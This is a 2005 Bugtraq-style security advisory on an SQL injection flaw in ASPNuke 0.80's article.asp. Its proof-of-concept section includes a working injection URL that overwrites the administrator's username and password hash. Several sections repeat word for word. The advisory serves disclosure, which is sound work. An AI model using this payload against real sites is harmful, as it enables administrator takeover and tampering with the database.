ASPNuke Article.ASP SQL Injection Vulnerability
BID:13318
Info
ASPNuke Article.ASP SQL Injection Vulnerability
| Bugtraq ID: | 13318 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 22 2005 12:00AM |
| Updated: | Apr 22 2005 12:00AM |
| Credit: | dcrab <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
ASPNuke ASPNuke 0.80 |
| Not Vulnerable: | |
Discussion
ASPNuke Article.ASP SQL Injection Vulnerability
ASPNuke is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
ASPNuke is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
ASPNuke Article.ASP SQL Injection Vulnerability
No exploit is required.
The following proof of concept is available:
http://www.example.com/module/article/article/article.asp?articleid='[SQL_INJECTION]
oil_karchack has supplied the following proof of concept exploit that will set the administrator username and password:
http://www.example.com/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf
4ca831485ba0da56328f818763ed34c72ca96533802c' , username='trapset'%20where%20userID=1%20--
No exploit is required.
The following proof of concept is available:
http://www.example.com/module/article/article/article.asp?articleid='[SQL_INJECTION]
oil_karchack has supplied the following proof of concept exploit that will set the administrator username and password:
http://www.example.com/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf
4ca831485ba0da56328f818763ed34c72ca96533802c' , username='trapset'%20where%20userID=1%20--
Solution / Fix
ASPNuke Article.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
ASPNuke Article.ASP SQL Injection Vulnerability
References:
References: